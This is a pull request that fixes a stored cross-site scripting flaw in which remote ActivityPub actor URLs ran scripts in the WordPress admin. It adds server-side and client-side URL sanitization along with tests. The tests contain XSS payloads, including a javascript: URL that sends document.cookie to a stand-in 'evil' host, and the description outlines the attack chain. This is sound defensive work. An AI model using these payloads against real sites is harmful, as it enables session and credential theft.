### PR TITLE
Remote actor URL: improve escaping

### DIFF
--- a/.github/changelog/fix-remote-actor-url-xss
+++ b/.github/changelog/fix-remote-actor-url-xss
@@ -1,0 +1,4 @@
+Significance: patch
+Type: security
+
+Fix a security issue where a remote actor's profile link could run scripts in the admin area.

--- a/includes/class-post-types.php
+++ b/includes/class-post-types.php
@@ -745,8 +745,8 @@ class Post_Types {
 					return array(
 						'username'   => $actor->get_preferred_username(),
 						'name'       => $actor->get_name() ?? $actor->get_preferred_username(),
-						'icon'       => object_to_uri( $actor->get_icon() ),
-						'url'        => object_to_uri( $actor->get_url() ?? $actor->get_id() ),
+						'icon'       => \sanitize_url( object_to_uri( $actor->get_icon() ) ?? '' ),
+						'url'        => \sanitize_url( object_to_uri( $actor->get_url() ?? $actor->get_id() ) ?? '' ),
 						'webfinger'  => Remote_Actors::get_acct( $response['id'] ),
 						'identifier' => $actor->get_id(),
 					);
@@ -833,8 +833,8 @@ class Post_Types {
 					return array(
 						'username'   => $actor->get_preferred_username(),
 						'name'       => $actor->get_name() ?? $actor->get_preferred_username(),
-						'icon'       => object_to_uri( $actor->get_icon() ),
-						'url'        => object_to_uri( $actor->get_url() ?? $actor->get_id() ),
+						'icon'       => \sanitize_url( object_to_uri( $actor->get_icon() ) ?? '' ),
+						'url'        => \sanitize_url( object_to_uri( $actor->get_url() ?? $actor->get_id() ) ?? '' ),
 						'webfinger'  => Remote_Actors::get_acct( $id ),
 						'identifier' => $actor->get_id(),
 					);

--- a/src/app/__tests__/utils.test.ts
+++ b/src/app/__tests__/utils.test.ts
@@ -1,0 +1,37 @@
+/**
+ * @jest-environment jsdom
+ */
+
+import { safeUrl } from '../utils';
+
+describe( 'safeUrl', () => {
+	it( 'returns http(s) URLs unchanged', () => {
+		expect( safeUrl( 'https://example.com/@alice' ) ).toBe( 'https://example.com/@alice' );
+		expect( safeUrl( 'http://example.com/path?a=1&b=2' ) ).toBe( 'http://example.com/path?a=1&b=2' );
+	} );
+
+	it( 'allows relative and protocol-relative URLs', () => {
+		expect( safeUrl( '/wp-admin/admin.php' ) ).toBe( '/wp-admin/admin.php' );
+		expect( safeUrl( '//example.com/avatar.png' ) ).toBe( '//example.com/avatar.png' );
+	} );
+
+	it( 'rejects javascript: URLs and returns the fallback', () => {
+		expect( safeUrl( 'javascript:alert(document.cookie)' ) ).toBe( '#' );
+		// Whitespace/case tricks are normalized away by the URL parser.
+		expect( safeUrl( '  JavaScript:alert(1)' ) ).toBe( '#' );
+		expect( safeUrl( 'java\tscript:alert(1)' ) ).toBe( '#' );
+	} );
+
+	it( 'rejects other script-executing or data schemes', () => {
+		expect( safeUrl( 'data:text/html,<script>alert(1)</script>' ) ).toBe( '#' );
+		expect( safeUrl( 'vbscript:msgbox(1)' ) ).toBe( '#' );
+	} );
+
+	it( 'returns the fallback for empty input', () => {
+		expect( safeUrl( '' ) ).toBe( '#' );
+	} );
+
+	it( 'honors a custom fallback', () => {
+		expect( safeUrl( 'javascript:alert(1)', '' ) ).toBe( '' );
+	} );
+} );

--- a/src/app/components/fields/name/__tests__/index.test.tsx
+++ b/src/app/components/fields/name/__tests__/index.test.tsx
@@ -1,0 +1,47 @@
+/**
+ * @jest-environment jsdom
+ */
+
+import '@testing-library/jest-dom';
+import { render } from '@testing-library/react';
+import { nameField } from '../index';
+import type { Actor } from '../../../../types';
+
+// Mock WordPress dependencies.
+jest.mock( '@wordpress/i18n', () => ( {
+	__: ( text: string ) => text,
+} ) );
+
+const createMockActor = ( url: string ): Actor =>
+	( {
+		id: 1,
+		actor_info: {
+			username: 'alice',
+			name: 'Alice',
+			icon: '',
+			url,
+			webfinger: 'alice@example.com',
+			identifier: 'https://example.com/@alice',
+		},
+	} ) as unknown as Actor;
+
+const renderName = ( item: Actor ): HTMLElement => {
+	const RenderComponent = nameField.render;
+	const { container } = render( <RenderComponent item={ item } field={ nameField as never } /> );
+	return container;
+};
+
+describe( 'nameField render', () => {
+	it( 'renders a valid http(s) actor URL as the link target', () => {
+		const link = renderName( createMockActor( 'https://example.com/@alice' ) ).querySelector( 'a' );
+		expect( link ).toHaveAttribute( 'href', 'https://example.com/@alice' );
+	} );
+
+	it( 'neutralizes a javascript: URL from a remote actor', () => {
+		const link = renderName( createMockActor( "javascript:fetch('//evil/?c='+document.cookie)" ) ).querySelector(
+			'a'
+		);
+		// Falls back to a harmless anchor instead of the script-executing href.
+		expect( link ).toHaveAttribute( 'href', '#' );
+	} );
+} );

--- a/src/app/components/fields/name/index.tsx
+++ b/src/app/components/fields/name/index.tsx
@@ -17,6 +17,7 @@ import type { Field } from '@wordpress/dataviews/wp';
  * Internal dependencies
  */
 import type { Actor } from '../../../types';
+import { safeUrl } from '../../../utils';
 
 export const nameField: Field< Actor > = {
 	id: 'name',
@@ -26,7 +27,7 @@ export const nameField: Field< Actor > = {
 	getValue: ( { item }: { item: Actor } ): string => item.actor_info?.name || '',
 	render: ( { item }: { item: Actor } ): ReactNode => {
 		const name: string = item.actor_info?.name || '';
-		const url: string = item.actor_info?.url || '#';
+		const url: string = safeUrl( item.actor_info?.url || '' );
 
 		return (
 			<a href={ url } target="_blank" rel="noopener noreferrer" className="activitypub-name-field__link">

--- a/src/app/components/fields/webfinger/index.tsx
+++ b/src/app/components/fields/webfinger/index.tsx
@@ -17,6 +17,7 @@ import type { Field } from '@wordpress/dataviews/wp';
  * Internal dependencies
  */
 import type { Actor } from '../../../types';
+import { safeUrl } from '../../../utils';
 
 export const webfingerField: Field< Actor > = {
 	id: 'webfinger',
@@ -25,7 +26,7 @@ export const webfingerField: Field< Actor > = {
 	getValue: ( { item }: { item: Actor } ): string => item.actor_info?.webfinger || '',
 	render: ( { item }: { item: Actor } ): ReactNode => {
 		const webfinger: string = item.actor_info?.webfinger || '';
-		const url: string = item.actor_info?.url || '#';
+		const url: string = safeUrl( item.actor_info?.url || '' );
 
 		if ( ! webfinger ) {
 			return <span>—</span>;

--- a/src/app/routes/feed/inspector.tsx
+++ b/src/app/routes/feed/inspector.tsx
@@ -25,7 +25,7 @@ import { close } from '@wordpress/icons';
  * Internal dependencies
  */
 import Avatar from '../../components/avatar';
-import { getRelativeTime } from '../../utils';
+import { getRelativeTime, safeUrl } from '../../utils';
 import { useTagFilter } from '../../hooks/use-tag-filter';
 import { useSearch, useNavigate } from '../../router';
 import type { ActorInfo, Comment, FeedPost } from '../../types';
@@ -104,7 +104,7 @@ export default function FeedInspector(): ReactNode {
 	const actor: ActorInfo = post.actor_info;
 	const author: string = decodeEntities( actor?.name || __( 'Unknown author', 'activitypub' ) );
 	const webfinger: string = actor?.webfinger || '';
-	const profileUrl: string = actor?.url || '';
+	const profileUrl: string = safeUrl( actor?.url || '', '' );
 	const postLink: string = post.link || '';
 	const relativeTime: string = post.date ? getRelativeTime( post.date ) : '';
 

--- a/src/app/utils.ts
+++ b/src/app/utils.ts
@@ -51,3 +51,29 @@ export function getRelativeTime( dateString: string ): string {
 	// Use site's date format for dates older than a week
 	return dateI18n( getSettings().formats.date, dateString );
 }
+
+/**
+ * Return a URL that is safe to use as an `href`/`src` attribute value.
+ *
+ * Remote actor data is stored and served verbatim, so an actor could supply a
+ * `javascript:` (or other script-executing) URL that React would render as-is.
+ * Only http(s) and protocol-relative/relative URLs are allowed through; anything
+ * else is replaced with a harmless fallback.
+ *
+ * @param url      The URL to validate.
+ * @param fallback Value returned when the URL is unsafe. Defaults to '#'.
+ * @return The original URL when safe, otherwise the fallback.
+ */
+export function safeUrl( url: string, fallback: string = '#' ): string {
+	if ( ! url ) {
+		return fallback;
+	}
+
+	try {
+		// Resolve against the current origin so relative/protocol-relative URLs stay valid.
+		const { protocol } = new URL( url, window.location.origin );
+		return 'http:' === protocol || 'https:' === protocol ? url : fallback;
+	} catch {
+		return fallback;
+	}
+}

--- a/tests/phpunit/tests/includes/class-test-post-types.php
+++ b/tests/phpunit/tests/includes/class-test-post-types.php
@@ -7,6 +7,7 @@
 
 namespace Activitypub\Tests;
 
+use Activitypub\Collection\Remote_Actors;
 use Activitypub\Post_Types;
 
 /**
@@ -59,5 +60,81 @@ class Test_Post_Types extends \WP_UnitTestCase {
 		$this->assertFalse( $post_type->show_in_rest );
 		$this->assertFalse( $post_type->delete_with_user );
 		$this->assertTrue( $post_type->exclude_from_search );
+	}
+
+	/**
+	 * A remote actor's URL and icon are attacker-controlled and stored verbatim,
+	 * so the actor_info REST field must strip script-executing schemes before the
+	 * admin UI renders them as links.
+	 *
+	 * @covers ::register_ap_actor_rest_field
+	 */
+	public function test_actor_info_rest_field_sanitizes_dangerous_urls() {
+		Post_Types::register_ap_actor_rest_field();
+
+		$post_id = Remote_Actors::create(
+			array(
+				'id'                => 'https://remote.example.com/actor/mallory',
+				'type'              => 'Person',
+				'url'               => "javascript:fetch('//evil/?c='+document.cookie)",
+				'icon'              => array(
+					'type' => 'Image',
+					'url'  => 'javascript:alert(document.domain)',
+				),
+				'inbox'             => 'https://remote.example.com/actor/mallory/inbox',
+				'name'              => 'Mallory',
+				'preferredUsername' => 'mallory',
+			)
+		);
+		$this->assertIsInt( $post_id );
+
+		$info = $this->get_actor_info( $post_id );
+
+		$this->assertSame( '', $info['url'], 'A javascript: actor URL should be stripped.' );
+		$this->assertSame( '', $info['icon'], 'A javascript: icon URL should be stripped.' );
+	}
+
+	/**
+	 * Legitimate http(s) actor URLs must pass through the actor_info REST field untouched.
+	 *
+	 * @covers ::register_ap_actor_rest_field
+	 */
+	public function test_actor_info_rest_field_preserves_safe_urls() {
+		Post_Types::register_ap_actor_rest_field();
+
+		$post_id = Remote_Actors::create(
+			array(
+				'id'                => 'https://remote.example.com/actor/alice',
+				'type'              => 'Person',
+				'url'               => 'https://remote.example.com/@alice',
+				'icon'              => array(
+					'type' => 'Image',
+					'url'  => 'https://remote.example.com/avatar.png',
+				),
+				'inbox'             => 'https://remote.example.com/actor/alice/inbox',
+				'name'              => 'Alice',
+				'preferredUsername' => 'alice',
+			)
+		);
+		$this->assertIsInt( $post_id );
+
+		$info = $this->get_actor_info( $post_id );
+
+		$this->assertSame( 'https://remote.example.com/@alice', $info['url'] );
+		$this->assertSame( 'https://remote.example.com/avatar.png', $info['icon'] );
+	}
+
+	/**
+	 * Invoke the registered actor_info REST field callback for a given actor post.
+	 *
+	 * @param int $post_id Remote actor post ID.
+	 * @return array The actor_info payload.
+	 */
+	private function get_actor_info( $post_id ) {
+		global $wp_rest_additional_fields;
+
+		$callback = $wp_rest_additional_fields[ Remote_Actors::POST_TYPE ]['actor_info']['get_callback'];
+
+		return \call_user_func( $callback, array( 'id' => $post_id ) );
 	}
 }


### PR DESCRIPTION
Fixes CM-850

## Proposed changes:

A remote (attacker-controlled) ActivityPub actor fully controls its `url` field. On ingestion the actor JSON is stored verbatim — `Remote_Actors::create()` strips KSES before `wp_insert_post()` — and the `actor_info` REST field returned it through `object_to_uri()` with no escaping. The React admin then rendered it as `<a href={ url }>` with no scheme validation, so a `javascript:` URL executed in the wp-admin origin the moment an admin clicked the actor's name or profile link in the Followers / Following / Blocked-actors tables or the Reader inspector. Remote, unauthenticated → stored → admin-context script execution (nonce theft, admin-privileged actions).

Fixed in two layers:

- **Server (primary):** `includes/class-post-types.php` now runs `sanitize_url()` over the `url` and `icon` values in both `actor_info` REST fields (`ap_actor` and `ap_post`). `sanitize_url()` drops disallowed protocols (`javascript:`, `data:`, …) at the trust boundary, so the API never emits a dangerous URL. Values are guarded with `?? ''` so avatar-less actors don't pass `null` into `sanitize_url()`.
- **Client (defense in depth):** a new `safeUrl()` helper in `src/app/utils.ts` allowlists `http(s)`/relative URLs before any `href`, applied to the three sinks that render an actor URL — the name field, the webfinger/profile field, and the feed inspector. It uses the WHATWG `URL` parser rather than a string blocklist, so scheme-obfuscation tricks (leading whitespace, embedded tabs, mixed case) don't slip through.

### Other information:

- [ ] Have you written new tests for your changes, if applicable?

## Testing instructions:

Check CI

### Changelog entry

<!-- You can optionally choose to enter a changelog entry by checking the box below and supplying data. -->
<!-- It will trigger a GitHub workflow that will create and push the entry into the branch. -->

<!-- Due to org permissions, the job may fail for PRs crated from a fork under GitHub organizations. -->
<!-- In this case, you can create entry manually with `composer changelog:add` and push it into the branch. -->

<!-- If no changelog entry is required for this PR, please add the "Skip Changelog" label. -->

-   [ ] Automatically create a changelog entry from the details below.

<details>

<summary>Changelog Entry Details</summary>

#### Significance

<!-- Choose only one -->

-   [ ] Patch
-   [ ] Minor
-   [ ] Major

#### Type

<!-- Choose only one -->

-   [ ] Added - for new features
-   [ ] Changed - for changes in existing functionality
-   [ ] Deprecated - for soon-to-be removed features
-   [ ] Removed - for now removed features
-   [ ] Fixed - for any bug fixes
-   [ ] Security - in case of vulnerabilities

#### Message

<!-- Add a changelog message here -->

</details>
